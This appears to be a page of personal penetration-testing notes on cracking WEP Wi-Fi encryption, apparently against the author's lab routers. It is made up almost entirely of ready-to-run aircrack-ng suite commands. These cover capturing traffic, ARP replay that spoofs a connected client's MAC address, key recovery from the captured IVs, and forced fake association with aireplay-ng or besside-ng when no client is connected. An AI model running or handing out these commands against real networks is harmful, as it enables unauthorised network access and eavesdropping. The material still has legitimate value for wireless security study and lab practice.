WEP

using dlink and Cyberlab as targets

ARP Replay

Used when another device is associated to the network.

run the following to identify connected devices:

airodump-ng --bssid F0:7D:68:44:61:EA -c 6 wlan0mon

in this scenario 'D0:D2:B0:73:39:9D' was connected to the Router.

Multiple windows are required:

Window 1:

airodump-ng --bssid F0:7D:68:44:61:EA -c 6 -w dlink wlan0mon

Window 2:

aireplay-ng --arpreplay -h D0:D2:B0:73:39:9D -b F0:7D:68:44:61:EA wlan0mon
# OR 
aireplay-ng -3 -h D0:D2:B0:73:39:9D -b F0:7D:68:44:61:EA wlan0mon

Window 3:

aircrack-ng dlink-01.cap

leave that running for around 10 minutes and you should capture all IVs to extract the hex password

Association attack:

If no clients are connected, you can force association of yourself by performing the following. This is a super slow attack.

# Dump/ Sniff traffic from the host and output
airodump-ng wlan0mon --bssid F0:7D:68:44:61:EA --essid dlink -w dlink --channel 6

# Associate using aireplay-ng
while true; do aireplay-ng -1 0 -a F0:7D:68:44:61:EA -1 0 wlan0mon; done

# OR 

# besside to force association
besside-ng -b F0:7D:68:44:61:EA wlan0mon

PreviousAircrack-ng NextWPA/ WPA2

Last updated 2 years ago